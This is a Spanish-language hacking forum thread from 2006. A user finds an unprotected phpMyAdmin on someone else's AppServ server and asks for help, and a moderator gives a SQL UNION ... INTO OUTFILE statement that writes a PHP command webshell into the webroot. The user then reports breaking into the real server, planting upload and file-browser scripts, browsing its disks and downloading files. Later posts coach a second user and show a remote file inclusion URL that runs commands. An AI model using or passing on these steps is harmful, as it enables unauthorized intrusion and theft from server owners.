Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales
Autor
|
Tema: Explotando root sin pass en servidor mysql para tener control sobre Apache-Win32 (Leído 3,416 veces)
|
dem00
|
Hola a todos, muy lindo este foro, por eso creo que encontraré aquí quien me de una ayudita o consejo. Explorando un server recogí los siguientes datos: • c:\appserv\www\ es donde tiene la web • Puedo ver el phpinfo (Apache/1.3.34 (Win32) PHP/4.4.1) • Pero lo que más me intriga es que tambien puedo acceder al phpmyadmin y éste está sin pass, osea que tengo privilegios de admin alli. Pero mi objetivo es muy simple, no quiero hacer ningún daño, ni cambiar nada. Sólo quiero ver los archivos que están en el index Porque en otros directorios (por ejemplo www.site.com/IMAGES) puedo ver lo que hay pero en www.site.com/ <--- aqui lo proteje con un index.html Yo quisiera ver si hay phps ahi u otros files, entonces pido que me orienten y me digan si con los datos que cuento puedo hacerlo. Ya que no quiero tocar nada en el phpmyadmin por no hacer algún daño sin darme cuenta. Desde ya muchas gracias a quien conteste por molestarse en leer las cuestiones de un novato. Gracias
|
|
|
|
« Última modificación: 30 Mayo 2006, 08:36 por SirDarckCat »
|
|
|
|
|
whaky
Angel del Infierno
|
Segun de que sea la web, en el phpmyadmin tendra una base de datos creada o no. Si la tiene busca el nombre del admin y su password (estara cifrado en md5 posiblemente). y asi podrias usar el admin y su password.
|
|
|
|
|
|
Los muertos hablan y las paredes oyen por si acaso nunca reveles tu identidad.
|
|
|
dem00
|
Segun de que sea la web, en el phpmyadmin tendra una base de datos creada o no. Si la tiene busca el nombre del admin y su password (estara cifrado en md5 posiblemente). y asi podrias usar el admin y su password.
Antes que nada muchas gracias por responderme Tiene estas bd: information_schema (16) forum (96) mysql (17) test (-) La única que veo que se realcione con el site es forum ya que el sitio tiene un foro vBulletin en www.site.com/foro/Pero el foro no me interesa, no quiero ver nada alli sino que tengo interés en los php y files sueltos alojados en www.site.com/ osea un index de lo que hay en appserv\www\ PD: si necesitas mas datos te los doy
|
|
|
|
« Última modificación: 28 Mayo 2006, 00:34 por dem00 »
|
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin

Lavando Platos
|
jaja por algunas reglas nuevas del mod security no puedo publicar la sentencia como debe ser , corrijan mis faltas de ortografia xDpues aunque no quieras hacer daño, una opcion viable, es que desde el phpmyadmin generes una sentencia que cree un archivo con una webshell, ya desde ahi tu puedes hacer lo que quieras. esto lo puedes hacer de multiples formas, usando el comando into outfile, es una de estas maneras. te pondre aqui una sentencia que deberia generar una webshell en c:\AWS\ tu modificala, para tu ruta. CELECT dato FR0M tabla WERE dato='EHNRULES' /**/UNI0N/**/ CELECT '<?sistem($_GET["c"]);?>' INT0 0UTFILE 'c:\\AWS\\wsh.php'explicando un poco esta sentencia: primero busca en la tabla un valor donde el dato sea igual a "EHNRULES" que dudo que exista xD, y regresa nada, despues hace un union con el script que queremos guardar, y mete los resultados de la sentencia, osea <?sistem($_GET['c']  ?> en el archivo especificado.  bastante sencillo no? cuando crees un nuevo mensaje, en el titulo especifica sobre que es tu duda. Saludos!!
|
|
|
|
|
|
|
|
|
dem00
|
Te agradezco mucho tu respuesta...
No entiedo mucho lo que tengo que hacer. Entonces voy a ponerme a leer los tutoriales del foro, depaso aprendo algo. En el transcurso de mis lecturas supongo que me iran surgiendo dudas, pero qué bueno que caí a este foro donde son tan amables de explicarle a un novato.
Muchas gracias.
PD: espero que miestras esté aprendiendo estos métodos no cambien el server y pongan el phpmyadmin con password jaja.
|
|
|
|
|
|
|
|
|
oRTNZ
no no soy malo... soy vicioso :p
|
uhh SirDarckCat , veo cosas nuevas, la otra vez mencionaste que se podia hacer lo del <?sistem($_GET["c"]);?> xd, y me pegue una testiada... asi que era de ese modo xd, entendido perfectamente.  dem00 , leete un manual de sql inyeccion, porque lo que te dio SirDarckCat , ya creo esta todo... creo que me voy de vacaciones xd, yo tambien he encontrado mucho de eso "c:\appserv\www\" y mas engorroso aun se puede probocar  , asi sea una web segura solo tiene que ser php, tambien tengo un bugcito que exploto,en el php , como un comentario adicicional, crea entradas en una web como si fueras admin ,osea que puedes poner otra web en cualquier web que sea php , xd esta de p**a madre... pd lo bonito de esto, es que webmasters internacionales y los mas conocidos son vulnerables!!! xd pd2 si me animo a mostrarlo mandare IM con imagenes y webs vulnerables.... (son conocidos  )
|
|
|
|
|
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p (03 del 08 de 2006) otro dia que lo recordare siempre... Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
dem00
|
Bueno, he hecho lo que debí haber hecho desde un principio... instalarme el paquete appserv de la misma version... jejejje bueno algunos tardamos en darnos cuenta. Estuve probando con algunas vulns que fui encontrando. PEro me faltan conocimientos para ello lamentablemente. Pongo unos ejemplos sacados del fantástico SECURITYFOCUS El que estoy tratando de saber como funciona es este "AppServ Open Project Remote File Include Vulnerability" h*tp://www.securityfocus.com/bid/16166/info El "proof of concept" sería este http://example/appserv/main.php?appserv_root=http://example/Lo pruebo y veo que hay algo totalmente explotable en ese directorio maldito appserv expuesto en esta clase de servers. Y además ya aprendi que si un server tiene ese directorio tambien por defecto tiene expuesto el phpmyadmin. Asique ahora estoy intentando saber qué es y como usar la técnica File IncludeIncluso lo que saco en claro como novato que soy es que ya de por sí visitando http://example/appserv/main.php ya nos tira un error de php y además muestra el directorio de instalación y la unidad que seguramente para gente experimentada como los que me contestaron aquí es und ato muy valioso. En resume el error es este: Warning: main(/lang-english.php): failed to open stream: No such file or directory in c:\appserv\www\appserv\main.php on line 27
Warning: main(): Failed opening '/lang-english.php' for inclusion (include_path='.;c:\php4\pear') in c:\appserv\www\appserv\main.php on line 27Tengo que aprender el file include, algo creo saber de que se trata. Dice que puedo usar o ejecutar un codigo remto de php, a veces piendo que puede ser www.site.comm/appserv/main.php?appserv_root?=URL/codigophp.php ... estoy muy equivocado????? También vi otro expoit: the program comes in default user (Root) and empty password which let attacker to contrlor program and computer. Que en este caso ya tendria que meter mano en el phpmyadmin que es más parecido al que pusieron antes aquí h*tp://www.securityfocus.com/archive/1/381514 the program comes in default user (Root) and empty password which let attacker to contrlor program and computer. Por todo muchas gracias y estoy aprendiendo mucho GRACIAS A USTEDES!!
|
|
|
|
|
|
|
|
|
dem00
|
Bueno he conseguido mi objetivo!!!
Lo hice muy a lo bruto ya que no sé nada de hacking ni de programación. Lo logré con algo que me di cuenta que es fundamental, improvisando y usando la cabeza, me basé en un exploit q puse de security focus, pero a mi manera pq la mayoria de lo que decía no entendí casi nada.
Lo que hice fue crear una tabla nueva en mysql con 1 solo field y de type text. como decia el xploit, luego le inserté un código php, (no el del exploit pq no lo entiendo y menos de montar todo eso del FTP, además que no se que es una shell) le metí el código de un php muy sencillo que es para hacer uploads, luego de esto hice el SELECT * From exploit o tabla nueva q hice INTO OUTFILE 'C:\\AppServ\\www\\upload.php'
una vez q me creó el upload.php con eso subí otro php que sirve para ver directorios y hacer downloads ya que mi objetivo sólo era ese.... asique me saqué la duda de lo que había ahi dentro, recorrí los 2 discos que tiene y me bajé algunas cosas y listo... no quiero saber nada mas con ese server... jaja .... aprendí de todo en este foro, gracias a todos.
|
|
|
|
|
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin

Lavando Platos
|
Bueno, aunque ya resolviste el problema.. File Include, te debes referir a "Remote File Inclusion", buscalo asi en internet. lo de INTO OUTFILE, pues es lo mismo que yo te decia, solo que tu hiciste la tabla  Saludos!!
|
|
|
|
|
|
|
|
|
dem00
|
Muchas gracias SDC, sí, hice lo de INTO OUTFILE, pero no de la manera que me dijiste ya que no lo entendía, casi no sé lo que es una shell. Incluso en mi vida había usado phpmyadmin ni ninguna base de datos ni php... asique me costó un poco hacer esa tabla tan sencilla.. jaja.
Saludos a todos
|
|
|
|
|
|
|
|
|
headshot
|
aja pero exatamente como es el codigo que debo usar en el quiero hacer lo mismo pero no entiendo tengo que hacer un php ? con select... o que ?
|
|
|
|
|
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin

Lavando Platos
|
@headshot una vez que sabes la ruta de la web, debes hacer que la respuesta del select sea igual a tu phpshell, despues haces una sentencia que introduzca la respuesta de esa sentencia en un archivo en la ruta de la web, usando la sentencia de SQL "INTO FILE".. para esto debes saber que es una webshell como funcionan, y sabes SQL.
Saludos!!
|
|
|
|
|
|
|
|
|
dem00
|
Mi consejo, ya que te veo tan desorientado como lo estaba yo es que, primero hagas un buena investigación sobre la vulns o los xploits sobre appserv. Segundo, y fundamental, que te instales el paquete appserv en tu pc, esto es fundamental para aprender como funciona y para hacer los ensayo del ataque que vayas a hacer. 3ro Es que el código que vayas a poner sea el que comprendas bien y el que te sirva para tus fines, hay muchas paginas con scripts php para lo que necesites. Fijate en los avisos de securityfocus que puse arriba que están bien explícitos y desarrollados. Y por último nada se consigue si no le pones esfuerzo y aunque empieces de 0 tienes que leero todo lo que puedas; y no vallas a hacer nada malo en el server que te metas, salvo que lo merezcan.
|
|
|
|
|
|
|
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin

Lavando Platos
|
@headshot debes agregar a la url c=[ALGO A EJECUTAR] por ejemplo http://ejemplo/appserv/main.php?c=dir&appserver_root=http://ejemplo/shell.php Saludos!!
|
|
|
|
|
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Apache - Como crear host virtuales para tener varias web almacenadas???
Desarrollo Web
|
alzehimer_cerebral
|
5
|
3,661
|
26 Noviembre 2010, 00:49
por alzehimer_cerebral
|
|
|
Scrip para Sniffear pass y datos sobre lan/wlan con ettercap, sslstrip, urlsnarf
Hacking Básico
|
r00ty
|
0
|
2,877
|
1 Diciembre 2010, 06:31
por r00ty
|
|
|
Google cree que los usuarios deberían tener el control de sus datos para ....
Noticias
|
wolfbcn
|
0
|
514
|
30 Mayo 2011, 01:23
por wolfbcn
|
|
|
[Video] Explotando Apache Tomcat 5.5 + Acceso Root + Escalación de Privilegios
Nivel Web
|
@Sthéfano
|
0
|
992
|
19 Julio 2011, 10:01
por @Sthéfano
|
|
|
dudas sobre servidor ( test de seguridad ) ssh, mysql.
Hacking Avanzado
|
tomeu00
|
2
|
572
|
18 Febrero 2012, 22:16
por alondra2
|
|